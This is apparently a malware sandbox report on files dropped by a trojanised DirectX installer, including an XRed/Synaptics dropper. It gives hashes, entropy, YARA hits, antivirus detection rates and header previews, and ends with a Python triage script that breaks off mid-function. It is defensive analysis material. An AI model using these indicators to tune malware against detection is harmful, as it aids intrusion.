                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):66865
                                                                                              Entropy (8bit):5.567626982635727
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Wn+OeDyG6lG9CVGQM6UP8XUUkw8KlNxLkPkjdARflPp0VZRTBM9oZPFASJu71N1F:V
                                                                                              MD5:B36D3F105D18E55534AD605CBF061A92
                                                                                              SHA1:788EF2DE1DEA6C8FE1D23A2E1007542F7321ED79
                                                                                              SHA-256:C6C5E877E92D387E977C135765075B7610DF2500E21C16E106A225216E6442AE
                                                                                              SHA-512:35AE00DA025FD578205337A018B35176095A876CD3C3CF67A3E8A8E69CD750A4CCC34CE240F11FAE3418E5E93CAF5082C987F0C63F9D953ED7CB8D9271E03B62
                                                                                              Malicious:false
                                                                                              Preview:..[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DXUpdate_Feb2005_x86]..DisplayName=%Feb2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=990,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Feb2005_d3dx9_24_x86.cab",3..Version=4,09,00,0904....[DXUpdate_Feb2005_x64]..DisplayName=%Feb2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1220,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Feb2005_d3dx9_24_x64.cab",3..Version=4,09,00,0904....[DXUpdate_Apr2005_x86]..DisplayName=%Apr2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1055,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Apr2005_d3dx9_25_x86.cab",3..Version=4,09,00,0904....[DXUpdate_Apr2005_x64]..DisplayName=%Apr2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1317
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):177152
                                                                                              Entropy (8bit):6.549767948531931
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:KU6LKKnw8i/9S7BLGKm/nuFV3uNgosUBxr+2y97CqGIpHtWMeJnQRLj+bTHyKaY:Iw8aIMrfuFVeNgosUBxra4rIZsqq
                                                                                              MD5:7ED554B08E5B69578F9DE012822C39C9
                                                                                              SHA1:036D04513E134786B4758DEF5AFF83D19BF50C6E
                                                                                              SHA-256:FB4F297E295C802B1377C6684734B7249D55743DFB7C14807BEF59A1B5DB63A2
                                                                                              SHA-512:7AF5F9C4A3AD5C120BCDD681B958808ADA4D885D21AEB4A009A36A674AD3ECE9B51837212A982DB6142A6B5580E5B68D46971B802456701391CE40785AE6EBD9
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M.CM...M...MJ..M...M...M...M...M...M...M..KM...M..zM...M..{M...M..JM...M..MM...MRich...M................PE..L......M...........!.....j...n............................................................@.........................pw..V....j..........8.......................X...p...................................@...............8............................text....h.......j.................. ..`.data....:...........n..............@....rsrc...8...........................@..@.reloc..0&.......(..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):12848
                                                                                              Entropy (8bit):5.071095411173453
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:eXTiDxtV0xxmBxbD6Ys7s6xHOJYwYdDxAp8xXZyUxIJM:eXiM
                                                                                              MD5:E6A74342F328AFA559D5B0544E113571
                                                                                              SHA1:A08B053DFD061391942D359C70F9DD406A968B7D
                                                                                              SHA-256:93F5589499EE4EE2812D73C0D8FEACBBCFE8C47B6D98572486BC0EFF3C5906CA
                                                                                              SHA-512:1E35E5BDFF1D551DA6C1220A1A228C657A56A70DEDF5BE2D9273FC540F9C9F0BB73469595309EA1FF561BE7480EE92D16F7ACBBD597136F4FC5F9B8B65ECDFAD
                                                                                              Malicious:false
                                                                                              Preview:..; ---- Common sections ----..[Version]..Signature = "$CHICAGO$"..AdvancedINF = 2.0..Provider = %MSFT%..SetupClass = BASE....[Strings]..MSFT = "Microsoft"....[MDXDLLs]..Microsoft.DirectX.AudioVideoPlayback.dll..Microsoft.DirectX.Diagnostics.dll..Microsoft.DirectX.Direct3D.dll..Microsoft.DirectX.Direct3DX.dll..Microsoft.DirectX.DirectDraw.dll..Microsoft.DirectX.DirectInput.dll..Microsoft.DirectX.DirectPlay.dll..Microsoft.DirectX.DirectSound.dll..Microsoft.DirectX.dll......; ---- Windows 98 ----..[4.09.00.0904.00-4.09.00.0904.00_Win98_Feb2005_d3dx9_24_x86.cab]..NumberOfFiles=4..Size=2178 ;approximately total file size (Size * 1024 bytes)..CopyCount=1..d3dx9_24_w9x.inf....[4.09.00.0904.00-4.09.00.0904.00_Win98_Feb2005_MDX_x86.MSI]..NumberOfFiles=1..Size=1788 ;approximately total file size (Size * 1024 bytes)..CopyCount=1..Dependencies=feb2005_d3dx9_24_x86.cab..Feb2005_MDX_x86.MSI......; ---- Windows ME ----..[4.09.00.0904.00-4.09.00.0904.00_WinME_Feb2005_d3dx9_24_x86.cab]..N
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):57739
                                                                                              Entropy (8bit):5.688682745352895
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eNITdgil00BU0twUZB7otN4PTH+y491I7/su6U3mI9rITogZD0+pYnrIvdgsl0KW:eEBDSYj4kiJOnitAmfdwe5q24jIxwzKI
                                                                                              MD5:0DAFB23D5BD4B80C79A0F82DC2DE34D0
                                                                                              SHA1:8159FD03F133C9CD8CFB194971A5250B9ECDA0A8
                                                                                              SHA-256:3EF4C33102886EAE3C812B948FF3FBF70BB03DD91E772B852DA3F9AAF75BDB29
                                                                                              SHA-512:78E7FB35CAB3D0ACE4E4FEF2868CC5F31B2254C267402779893B3F3FCE90B8D784328AC19EF0D6BD37D975D557917BE19D7A8A32A94FF8606AFD36883EC1C9BB
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DirectX_Win9X]..DisplayName=%DirectX_Win9X%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4608,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x.cab",3..URL2="dinput_w9x_81.cab",3..URL3="dplay_w9x.cab",3..URL4="dshow_w9x.cab",3..URL5="dshow_w9x_81.cab",3..URL6="graphics_w9x.cab",3..URL7="graphics_w9x_81.cab",3..URL8="ks_w9x.cab",3..URL9="vb_w9x.cab",3..URL10="bda_w9x.cab",3..URL11="setup_w9x.cab",3..Version="9,29,1962,0"....[DirectX_Win98_ENG]..DisplayName=%DirectX_Win98%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4348,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x_eng.cab",3..URL2="dinput_w9x_81_eng.cab",3..URL3="dplay_w9x_eng.cab",3..URL4="dshow_w9x_eng.cab",3..URL5="dxdiag_w9x_eng.cab",3..URL6="graphics_w9x_eng.cab"
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):498688
                                                                                              Entropy (8bit):5.921914360240825
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:yiqLKTd9mKfwm7rfrK7iPG6rG3C7hO4YTYHVzoPD+sUn7RG+hPXzNbgC1Adm2exP:6kvS4c3C7iMw70
                                                                                              MD5:EAA6B5EE297982A6A396354814006761
                                                                                              SHA1:780BF9A61C080A335E8712C5544FCBF9C7BDCD72
                                                                                              SHA-256:D298FD82A39B2385A742BA1992466E081BEA0F49E19ECE6B2C87C7C262E1FCEE
                                                                                              SHA-512:EBDC887B6B334B7560F85AB2EBD29DC1F3A2DEDAC7F70042594F2A9BC128B6FCA0A0E7704318ED69B7ACF097E962533B3CE07713EF80E8ACFE09374C13302999
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`7..$V..$V..$V..K L.5V..-.A.5V..$V..V..K x.OV..K y..V..K H.%V..K O.%V..Rich$V..................PE..L....A.L.................v..."....................................................../.....@...... ..........................Lx.......................................................................^..@...............`............................text....u.......v.................. ..`.data....1...........z..............@....rsrc...............................@..@.reloc........... ...|..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):477
                                                                                              Entropy (8bit):5.237059564403252
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:AEAv+BIHfXhPJycXlnMlr4TFagtVFIglFdW8HEwF2T2GHEdqT2azM2GvjokVj2aE:BBIpPJhXlnMYFz2gkDvqtwqa9YS7r
                                                                                              MD5:AD8982EAA02C7AD4D7CDCBC248CAA941
                                                                                              SHA1:4CCD8E038D73A5361D754C7598ED238FC040D16B
                                                                                              SHA-256:D63C35E9B43EB0F28FFC28F61C9C9A306DA9C9DE3386770A7EB19FAA44DBFC00
                                                                                              SHA-512:5C805D78BAFFF06C36B5DF6286709DDF2D36808280F92E62DC4C285EDD9176195A764D5CF0BB000DA53CA8BBF66DDD61D852E4259E3113F6529E2D7BDBDD6E28
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature="$CHICAGO$"..AdvancedINF=2.0..Provider = %MSFT%....[SourceDisksNames]..1 = %DiskName%,DXWSETUP.EXE,0....[SourceDisksFiles]..dsetup.dll=1..dsetup32.dll=1....[DestinationDirs]..DSetupDLL=11,directx\websetup....[DirectX_WinNT]..CopyFiles=DSetupDLL....[DirectX_Win9X]..CopyFiles=DSetupDLL....[CleanUp]..DelFiles=DSetupDLL....[DSetupDLL]..dsetup.dll,,,32..dsetup32.dll,,,32....[Strings]..MSFT = "Microsoft"..DiskName = "DXWSETUP"....
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):18387
                                                                                              Entropy (8bit):7.523057953697544
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                              Malicious:false
                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.252463725043014
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0TTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                              MD5:BC8ABA5D490ADDFC268FE40D4DCC2A77
                                                                                              SHA1:20E6228F6522FF96508D8AA553CE1D7E55508544
                                                                                              SHA-256:89FDB949EB2C2D8A3C0080F092B88E9104057C813C9411CECB65E145F97B6278
                                                                                              SHA-512:D01A62CDB2C0429C0E9F6A87C4A684EDCC22E56D856A89CE89E274F4AAD34708543928E04437EE907E31BDF18EB7277ABBEC49BC35F7DD7480BCD5220943374D
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xDHj-wi5GuueQlAnJeFd8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.5231029153786204
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                              MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                              SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                              SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                              SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                              Malicious:false
                                                                                              Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):3.746897789531007
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                              Malicious:false
                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):288088
                                                                                              Entropy (8bit):7.744384810651628
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:pWK8EGMUjp5cGQ3Mek1B3B9h8Ins3i8AEYBSawz1YSc:JGvjp5cj35kDB9hrs3zARBSaJSc
                                                                                              MD5:FD6057B33E15A553DDC5D9873723CE8F
                                                                                              SHA1:F90EFB623B5ABEA70AF63C470DAA8674444FB1DF
                                                                                              SHA-256:111AEDDC6A6DBF64B28CB565AA12AF9EE3CC0A56CE31E4DA0068CF6B474C3288
                                                                                              SHA-512:D894630C9A4BDB767E9F16D1B701ACBDF011E721768BA0DC7A24E6D82A4D062A7CA253B1B334EDBA38C06187104351203A92C017838BDD9F13905CDE30F7D94D
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......->..i_.i_.i_..|.d_.i_.._..|..h_..|.q_..|.h_.Richi_.........PE..L...!.};............................^Z..............................................O................................................................N..X............................................................................................text............................... ..`.data...............................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):18387
                                                                                              Entropy (8bit):7.523057953697544
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                              Malicious:false
                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.5231029153786204
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                              MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                              SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                              SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                              SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                              Malicious:false
                                                                                              Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):771584
                                                                                              Entropy (8bit):6.6264053582391735
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                              MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                              SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                              SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 94%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):44136
                                                                                              Entropy (8bit):5.353600136878281
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ORnJa10OSg6HroC7jf4KEdRdoVwIBZZcU6MJNY8Rj6x8i/jJfDb20/xAx0Ix1ULc:Oam
                                                                                              MD5:41C2F221F8F75FB214CFB1804491344B
                                                                                              SHA1:3BC0851662C804A97B1204E891B5AFFFF9974E0A
                                                                                              SHA-256:B695B39844670CF0E1E32D69F23B5BBE0C656DB9CFDC685F061AE957C6E18662
                                                                                              SHA-512:F2727C1E961110739FA8ACCBB66CE59EC9403C5D1649366C9ADC97260064990386C16A0127D981DD7AECC7B04785FE3F2DA8DCF7FB9D2F144035C5E40FB5BB3F
                                                                                              Malicious:false
                                                                                              Preview:01/02/25 14:37:44: DXWSetup: ***** DXWSETUP *****..01/02/25 14:37:44: DXWSetup: WinMain()..01/02/25 14:37:44: DXWSetup: IsIA64(): not IA64...01/02/25 14:37:44: DXWSetup: Unable to get Version on target file C:\Windows\system32\directx\websetup\dsetup.dll..01/02/25 14:37:44: DXWSetup: Installed file C:\Windows\system32\directx\websetup\dsetup.dll..01/02/25 14:37:44: DXWSetup: Unable to get Version on target file C:\Windows\system32\directx\websetup\dsetup32.dll..01/02/25 14:37:44: DXWSetup: Installed file C:\Windows\system32\directx\websetup\dsetup32.dll..01/02/25 14:37:44: DXWSetup: GetDXVersion(): Unable to get RC string from registry...01/02/25 14:37:44: DXWSetup: DirectX Version: 4.09.00.0904.00..01/02/25 14:37:44: DXWSetup: Setup Version: 4.09.00.0904.00..01/02/25 14:37:44: DXWSetup: A newer version of DirectX have been installed already...01/02/25 14:37:45: dsetup32: IsWow64(): running on Wow64...01/02/25 14:37:52: DXWSetup: CDXWSetup::CDXWSetup()..01/02/25 14:37:52: DXWSetup: CDX
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1341394 bytes, 5 files, at 0x44 +A "d3dx9_25_x64.cat" +A "d3dx9_25.dll", flags 0x4, ID 6661, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1350562
                                                                                              Entropy (8bit):7.999714569554039
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qc+wdspnWpjnrcf+FH+guUawET50xShS+KMMMBNNxjUBH/0ghOw5b:r+AspngnK1TDhS+jMMBN3jeHLhOE
                                                                                              MD5:E961A77647E7FC2597A68FF572F730E1
                                                                                              SHA1:976D1CDE1EC28A4992E1CBC345637447115F14C8
                                                                                              SHA-256:A239E99D02FBFC9D30D5B705AA743FC070386FAEA1A66B3D67099AB446568A12
                                                                                              SHA-512:CF72AE18E99942D959BCE58678F544A10C98802D919ADC30737389D6CC0D492F8D7902E0E2CD04501FE6429B96C782649658D2D35C879A202C23E88570A15B94
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............w...7.........r2. .d3dx9_25_x64.cat..V:.7.....r2|. .d3dx9_25.dll......t:...r2X. .infinst.exe.&....V;...r2.. .apr2005_d3dx9_25_x64.inf......Y;...r2-. .d3dx9_25_x64.inf..q...9..[.... .cm......R.P...OB.."..AI5.]..."..UL.F.$.T.S*..iR..rJA.O9N/..jGJ.........\..=.....z.....5L..9.SA/&..,;e.l.@...C..Y..z...a}M...d..qh...:.'..@...o............T.{7..s.d1".........Y.*./.z..7(....N.k...,3...).h.>X..X...l.....A\p[....`y.......G..^d.c".j..k.....M...].ef.@..c...-.!.%O3.<G..B.y..A,.B..G%0..K...J...XX.Ig.|=.. ....#.t..>.#....S...^@..@.^m..@.l.....zI...y...L.Q.C.....x.[W..y..Z...o^.].G...G..4.q........o.xQA.....O...&B..s!......=Ovrtq.X.-}.u,k..:ju&m,$.5.V.T.z%......\.G.Dx...~-W.......... X.>.L...I.y?.f.1....4..J.b....%.e.t..U....o(..A...o.?.X..._?......).$.k.#..5o.>..&.0..a....8k....&E......$...Y..q.Y.....O...?...}}=.]'7.Knw....@.n.../.....".....RB.tg.._..Se'2.B)........6..p.K=......fz...z......I..y..uA
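The records above are built from a handful of reproducible measurements: the four hashes, the 8-bit entropy figure with the Encrypted flag derived from it, and a file type read off the magic bytes (MZ, the Delphi MZP stub seen in the XRed record, MSCF for cabinets, PK for the Office 2007+ documents, the OLE2 signature for the Composite Document File). The Python below is an added example, not Joe Sandbox's code, that recomputes those fields for any dropped file so the same triage can be repeated offline on a quarantined sample set. The 7.99 entropy threshold is an assumption chosen only so that the 7.744 self-extractor sorts as not encrypted and the 7.999 cabinets as encrypted, as on this page; the sample inputs are constructed in the block, and ssdeep is omitted because it is not in the standard library.

```python
"""Offline triage of sandbox-dropped files: hashes, 8-bit Shannon entropy,
an entropy-based 'Encrypted' flag and magic-byte typing (added example,
not Joe Sandbox code; the threshold below is an assumption)."""
import hashlib
import math
from collections import Counter
from dataclasses import dataclass
from typing import Optional

ENCRYPTED_THRESHOLD = 7.99  # assumption: 7.744 -> False, 7.9997 -> True, as on this page
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 .. 8.0), i.e. the report's 'Entropy (8bit)'."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_type(data: bytes) -> Optional[str]:
    """Follow e_lfanew from the DOS header to the PE signature; None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    magic = int.from_bytes(data[e_lfanew + 24:e_lfanew + 26], "little")
    bits = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE")
    # Borland/Delphi linkers emit 'MZP' at offset 0 of the DOS stub, the
    # shape of the 771584-byte XRed dropper record on this page.
    stub = " (Delphi DOS stub)" if data[2:3] == b"P" else ""
    return f"{bits} executable{stub}"


def classify(data: bytes) -> str:
    """Coarse typing from magic bytes, mirroring the report's 'File Type' field."""
    pe = pe_type(data)
    if pe:
        return pe
    if data[:2] == b"MZ":
        return "MS-DOS executable (no PE header)"
    if data.startswith(b"MSCF"):
        return "Microsoft Cabinet archive"
    if data.startswith(b"PK\x03\x04"):
        return "ZIP container (Office 2007+ documents are ZIP)"
    if data.startswith(OLE2_MAGIC):
        return "Composite Document File V2"
    if data.lstrip().lower().startswith((b"<html", b"<!doctype")):
        return "HTML document"
    try:
        data.decode("ascii")
        return "ASCII text"
    except UnicodeDecodeError:
        return "data"


@dataclass
class DroppedFileRecord:
    size: int
    entropy: float
    encrypted: bool
    file_type: str
    md5: str
    sha1: str
    sha256: str
    sha512: str


def triage_bytes(data: bytes) -> DroppedFileRecord:
    ent = shannon_entropy(data)
    return DroppedFileRecord(
        size=len(data), entropy=ent, encrypted=ent > ENCRYPTED_THRESHOLD,
        file_type=classify(data),
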